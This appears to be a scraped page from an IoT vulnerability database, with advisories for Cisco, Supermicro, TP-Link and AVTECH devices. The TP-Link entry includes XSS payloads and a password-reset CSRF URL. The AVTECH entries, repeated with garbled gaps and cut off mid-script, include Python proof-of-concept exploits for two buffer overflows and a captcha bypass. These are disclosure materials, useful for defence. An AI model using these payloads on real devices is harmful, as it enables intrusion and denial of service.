VARIoT IoT vulnerabilities database

NetGear RAIDiator is a direct-hanging storage device based on Linux and debian-sparc platforms. There are several security vulnerabilities in NetGear RAIDiator: 1. There are many unspecified errors in the CIFS service. 2. There are multiple unspecified errors in the DLNA service. 3. There are several unspecified errors in the iTunes service. 4, Frontview has multiple unspecified errors. No detailed vulnerability details are currently available.

Rugged Operating System is prone to a security-bypass vulnerability. An attacker may exploit this issue to bypass certain security restrictions and perform unauthorized actions. Rugged Operating System prior to 3.12.2 are vulnerable.

Cogent DataHub is prone to an unspecified arbitrary-file-overwrite vulnerability and multiple unspecified denial-of-service vulnerabilities. Attackers can leverage these issues to overwrite arbitrary files on the victim's computer in the context of the vulnerable application, crash the application that uses the affected library, denying service to legitimate users. Limited information is currently available regarding this issue. We will update this BID as more information emerges. Versions prior to Cogent DataHub 7.3.3 are vulnerable.

Cisco Mobility Services Engine does not properly set up the Oracle SSL service, which allows remote attackers to obtain an unauthenticated session to the database-replication port, and consequently obtain sensitive information, via an SSL connection, aka Bug ID CSCue50794. Cisco Mobility Services Engine is prone to a security-bypass vulnerability. Exploiting this issue could allow an attacker to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCue50794. The platform collects, stores and manages data from wireless clients, Cisco access points and controllers. A security bypass vulnerability exists in Cisco MSE due to a misconfigured Oracle SSL server

The Web Administrator Interface on Cisco Wireless LAN Controller (WLC) devices allows remote authenticated users to cause a denial of service (device crash) by leveraging membership in the Full Manager managers group, Read Only managers group, or Lobby Ambassador managers group, and sending a request that (1) lacks a parameter value or (2) contains a malformed parameter value, aka Bug IDs CSCuh14313, CSCuh14159, CSCuh14368, and CSCuh14436. Cisco Wireless LAN Controller (WLC) Runs on the device Web Administrator interface includes service disruption ( Device crash ) There are vulnerabilities that are put into a state. The Cisco WLC is responsible for system-wide wireless LAN functions such as security policy, intrusion protection, RF management, quality of service, and mobility. An attacker with any Full Manager, Read Only, and Lobby Ambassador manager group member accounts is authenticated and submits a request to the affected device. The request contains missing values or malformed values for specific parameters, which can cause the device to reboot. When it crashes, an authenticated remote attacker can exploit this vulnerability to cause a denial of service. These issues are being tracked by Cisco Bug IDs CSCuh14313, CSCuh14159, CSCuh14368, and CSCuh14436. The vulnerability is caused by the program not properly filtering parameters

The TCP implementation in Cisco IOS does not properly implement the transitions from the ESTABLISHED state to the CLOSED state, which allows remote attackers to cause a denial of service (flood of ACK packets) via a crafted series of ACK and FIN packets, aka Bug ID CSCtz14399. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This vulnerability stems from an error closing an established TCP connection. Cisco IOS is prone to a remote denial-of-service vulnerability. Exploiting this issue may allow remote attackers to trigger denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCtz14399

The TP-LINK TD-W8951ND Router is a wireless router device. TP-LINK TD-W8951ND Router Firmware 4.0.0 Build 120607 Release 30923 has multiple cross-site scripting and cross-site request forgery vulnerabilities. Allows an attacker to exploit a vulnerability to obtain sensitive information or hijack a user's session: 1. Incorrect handling of the Referer field without a URL, allowing unauthenticated attackers to exploit the vulnerability for a reflective cross-site scripting vulnerability. 2. The \"home_wlan_1\" parameter is incorrectly handled, allowing authenticated attackers to exploit vulnerabilities for reflective cross-site scripting vulnerabilities. 3. There are multiple cross-site request forgery attacks, allowing the attacker to construct a malicious URI, enticing the login user to resolve, and performing malicious operations in the target user context, such as resetting the administrator password. Attackers can use these vulnerabilities to execute arbitrary script code in the context of the affected site. They can steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, and there may be other forms of attacks. There are vulnerabilities in TP-Link TD-W8951ND 4.0.0 Build 120607.Rel. 30923, other versions may also be affected. Other attacks may also be possible. ----------- Author: ----------- xistence < xistence[at]0x90[.]nl > ------------------------- Affected products: ------------------------- Tested on TP-Link TD-W8951ND Firmware 4.0.0 Build 120607 Rel.30923 ------------------------- Affected vendors: ------------------------- TP-Link http://www.tp-link.com/ ---------- Details: ---------- [ 0x01 - Unauthenticated Reflected XSS in Referer for non-existing url pages ] GET /doesnotexist HTTP/1.1 Host: <IP> Referer: http://pwned"><script>alert("XSS")</script> Connection: keep-alive [ 0x02 - Authenticated Reflected XSS in "home_wlan_1" arguments ] http:// <IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http:// <IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E http:// <IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E [ 0x03 - Authenticated XSS in diagnostics (ping) "/Forms/tools_test_1" argument "PingIPAddr" ] POST /Forms/tools_test_1 HTTP/1.1 Host: <IP> Referer: http://<IP>/maintenance/tools_test.htm Authorization: Basic blablabla== Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164 Test_PVC=PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingflag=1&trace_open_flag=0&InfoDisplay=Ping+request+could+not+find+host+ [ 0x04 - Reset Admin password CSRF ] http:// <IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfirm=PWNED -------------- Timeline: -------------- 2013-05-30 Provided details to TP-Link. 2013-06-01 Response from TP-Link that they will try to fix it. 2013-07-31 No further response, mailed again to ask for status. 2013-08-30 No response, public disclosure

Multiple stack-based buffer overflows in the web interface in the Intelligent Platform Management Interface (IPMI) implementation on Supermicro H8DC*, H8DG*, H8SCM-F, H8SGL-F, H8SM*, X7SP*, X8DT*, X8SI*, X9DAX-*, X9DB*, X9DR*, X9QR*, X9SBAA-F, X9SC*, X9SPU-F, and X9SR* devices allow remote attackers to execute arbitrary code on the Baseboard Management Controller (BMC), as demonstrated by the (1) username or (2) password field in login.cgi. Supermicro IPMI is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit these issues to execute arbitrary code in the context of the device that uses the affected interface. Failed exploit attempts will likely crash the device

The web interface in the Intelligent Platform Management Interface (IPMI) implementation on Supermicro H8DC*, H8DG*, H8SCM-F, H8SGL-F, H8SM*, X7SP*, X8DT*, X8SI*, X9DAX-*, X9DB*, X9DR*, X9QR*, X9SBAA-F, X9SC*, X9SPU-F, and X9SR* devices allows remote authenticated users to execute arbitrary commands via shell metacharacters, as demonstrated by the IP address field in config_date_time.cgi. Supermicro IPMI Web Interface is prone to an unspecified remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data

The web interface in the Intelligent Platform Management Interface (IPMI) implementation on Supermicro H8DC*, H8DG*, H8SCM-F, H8SGL-F, H8SM*, X7SP*, X8DT*, X8SI*, X9DAX-*, X9DB*, X9DR*, X9QR*, X9SBAA-F, X9SC*, X9SPU-F, and X9SR* devices relies on JavaScript code on the client for authorization checks, which allows remote authenticated users to bypass intended access restrictions via a crafted request, related to the PrivilegeCallBack function. Supermicro Intelligent Platform Management Interface (IPMI) implementations based on ATEN firmware contain multiple vulnerabilities in their web management interface. Supermicro IPMI Web Interface is prone to a remote privilege-escalation vulnerability because it fails to adequately sanitize user-supplied input data. Remote attackers can exploit this issue to gain elevated privileges and perform unauthorized actions

The protocol-inspection feature on Cisco Adaptive Security Appliances (ASA) devices does not properly implement the idle timeout, which allows remote attackers to cause a denial of service (connection-table exhaustion) via crafted requests that use an inspected protocol, aka Bug ID CSCuh13899. Vendors have confirmed this vulnerability Bug ID CSCuh13899 It is released as.Denial of service by a third party via crafted request using inspected protocol ( Connection table exhaustion ) There is a possibility of being put into a state. Cisco Adaptive Security Appliance is prone to a denial-of-service vulnerability. A remote attacker may exploit this issue to cause denial-of-service conditions. This issue is being tracked by Cisco Bug IDs CSCuh13899

Memory leak in the CLI component on Cisco Unified Computing System (UCS) 6100 Fabric Interconnect devices, in certain situations that lack a SPAN session, allows local users to cause a denial of service (memory consumption and device reset) via a (1) "show monitor session all" or (2) "show monitor session" command, aka Bug ID CSCug20103. Cisco Unified Computing System is prone to multiple local denial-of-service vulnerabilities. Local attacker can exploit these issues to cause an affected device to reload or become unresponsive, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCug20103. The system integrates network, computing and virtualization resources into one platform by extensively adopting virtualization technology. The vulnerability is caused by not releasing memory after executing CLI commands and not configuring a SPAN session

The RIP process in Cisco IOS XR allows remote attackers to cause a denial of service (process crash) via a crafted version-2 RIP packet, aka Bug ID CSCue46731. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture. The RIP process crashes because the attacker does not correctly verify the message input and allows the attacker to send a special RIP Version 2 message. An attacker can exploit this issue to cause the RIP process to crash on an affected device, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug IDs CSCue46731

Multiple cross-site scripting (XSS) vulnerabilities in the guest portal in Cisco Identity Services Engine (ISE) Software allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCud11139 and CSCug02904. Vendors have confirmed this vulnerability Bug ID CSCud11139 and CSCug02904 It is released as.By any third party Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues are being tracked by Cisco Bug IDs CSCud11139 and CSCug02904. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. A remote attacker could exploit these vulnerabilities to inject arbitrary Web script or HTML

AVTECH AVN801 DVR has a security bypass via the administration login captcha. AVTECH AVN801 DVR Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. AVTECH AVN801 is a digital video recorder product. AVTECH AVN801 has a security restriction bypass vulnerability when running firmware version 1017-1003-1009-1003. A remote attacker can completely bypass captcha protection by sending multiple requests with any hard-coded verification code and matching verification code. AVTECH AVN801 is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass certain security restrictions and perform unauthorized actions. *Advisory Information* Title: AVTECH DVR multiple vulnerabilities Advisory ID: CORE-2013-0726 Advisory URL: http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: AVTECH Corporation Release mode: User release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper Access Control [CWE-284] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982 3. *Vulnerability Description* Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and potentially other devices sharing the affected firmware) that could allow a remote attacker: 1. [CVE-2013-4980] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler. 2. [CVE-2013-4981] To execute arbitrary code without authentication by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a specially crafted HTTP POST request. 3. 4. *Vulnerable Packages* . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from AVTECH support team after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'. 6. *Credits* [CVE-2013-4980] was discovered and researched by Anibal Sacco from Core Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were discovered and researched by Facundo Pantaleo from Core Security Consulting Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Buffer Overflow in RTSP Packet Handler* [CVE-2013-4980] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the RTSP transaction; no authentication is required. As a result, the device crashes and it could possibly lead to a remote code execution. /----- import socket HOST = '192.168.1.1' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n" trigger_pkt += "CSeq: 1\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" print "[*] Sending trigger" s.sendall(trigger_pkt) data = s.recv(1024) print '[*] Response:', repr(data), "\r\n" s.close() -----/ 7.2. *Buffer Overflow in config.cgi Parameters* [CVE-2013-4981] The following Python script exploits other buffer overflow condition; no authentication is required. As a result, the device crashes and it would possible lead to a remote code execution. /----- import httplib ip = "192.168.1.1" conn = httplib.HTTPConnection(ip) conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1") resp = conn.getresponse() print resp.read() -----/ 7.3. As a result, the captcha protection can by completely bypassed. /----- import httplib ip = "192.168.1.1" print "Performing captcha replay with hardcoded wrong captcha code and verify code..." conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() print "Performing several captcha replays with hardcoded right captcha code and verify code..." for i in range(1, 10): conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() -----/ 8. *Report Timeline* . 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received. 2013-08-12: Core attempts to contact vendor. 2013-08-20: Core attempts to contact vendor. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'. 9. *References* [1] http://www.avtech.com.tw. [2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Buffer overflow in cgi-bin/user/Config.cgi in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the Network.SMTP.Receivers parameter. AVTECH AVN801 is a digital video recorder product. A buffer overflow vulnerability exists in AVTECH AVN801 '/cgi-bin/user/Config.cgi'. No authentication is required. A remote attacker can exploit the vulnerability to execute arbitrary code through a specially crafted HTTP POST request. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition. AVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ AVTECH DVR multiple vulnerabilities 1. *Advisory Information* Title: AVTECH DVR multiple vulnerabilities Advisory ID: CORE-2013-0726 Advisory URL: http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: AVTECH Corporation Release mode: User release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper Access Control [CWE-284] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982 3. *Vulnerability Description* Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and potentially other devices sharing the affected firmware) that could allow a remote attacker: 1. 2. 3. [CVE-2013-4982] To bypass the captcha of the administration login console enabling several automated attack vectors. 4. *Vulnerable Packages* . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from AVTECH support team after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'. 6. *Credits* [CVE-2013-4980] was discovered and researched by Anibal Sacco from Core Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were discovered and researched by Facundo Pantaleo from Core Security Consulting Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Buffer Overflow in RTSP Packet Handler* [CVE-2013-4980] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the RTSP transaction; no authentication is required. As a result, the device crashes and it could possibly lead to a remote code execution. /----- import socket HOST = '192.168.1.1' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "SETUP Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS RTSP/1.0\r\n" trigger_pkt += "CSeq: 1\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" print "[*] Sending trigger" s.sendall(trigger_pkt) data = s.recv(1024) print '[*] Response:', repr(data), "\r\n" s.close() -----/ 7.2. As a result, the device crashes and it would possible lead to a remote code execution. /----- import httplib ip = "192.168.1.1" conn = httplib.HTTPConnection(ip) conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1") resp = conn.getresponse() print resp.read() -----/ 7.3. *CAPTCHA Bypass* [CVE-2013-4982] The following Python proof of concept sends a wrong captcha in first place (just to verify that captcha protection is enabled); then, it sends ten requests with an arbitrary hardcoded captcha and its matching verification code. As a result, the captcha protection can by completely bypassed. /----- import httplib ip = "192.168.1.1" print "Performing captcha replay with hardcoded wrong captcha code and verify code..." conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() print "Performing several captcha replays with hardcoded right captcha code and verify code..." for i in range(1, 10): conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() -----/ 8. *Report Timeline* . 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received. 2013-08-12: Core attempts to contact vendor. 2013-08-20: Core attempts to contact vendor. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'. 9. *References* [1] http://www.avtech.com.tw. [2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Buffer overflow in the RTSP Packet Handler in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the URI in an RTSP SETUP request. AVTECH AVN801 is a digital video recorder product. When AVTECH AVN801 runs firmware version 1017-1003-1009-1003, the RTSP message handler handles the RTSP transaction with a buffer overflow vulnerability that does not require authentication. A remote attacker can cause device crashes and remote code execution. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition. AVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ AVTECH DVR multiple vulnerabilities 1. *Advisory Information* Title: AVTECH DVR multiple vulnerabilities Advisory ID: CORE-2013-0726 Advisory URL: http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: AVTECH Corporation Release mode: User release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper Access Control [CWE-284] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982 3. *Vulnerability Description* Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and potentially other devices sharing the affected firmware) that could allow a remote attacker: 1. 2. [CVE-2013-4981] To execute arbitrary code without authentication by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a specially crafted HTTP POST request. 3. [CVE-2013-4982] To bypass the captcha of the administration login console enabling several automated attack vectors. 4. *Vulnerable Packages* . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from AVTECH support team after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'. 6. *Credits* [CVE-2013-4980] was discovered and researched by Anibal Sacco from Core Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were discovered and researched by Facundo Pantaleo from Core Security Consulting Team. 7. *Technical Description / Proof of Concept Code* 7.1. /----- import socket HOST = '192.168.1.1' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "SETUP 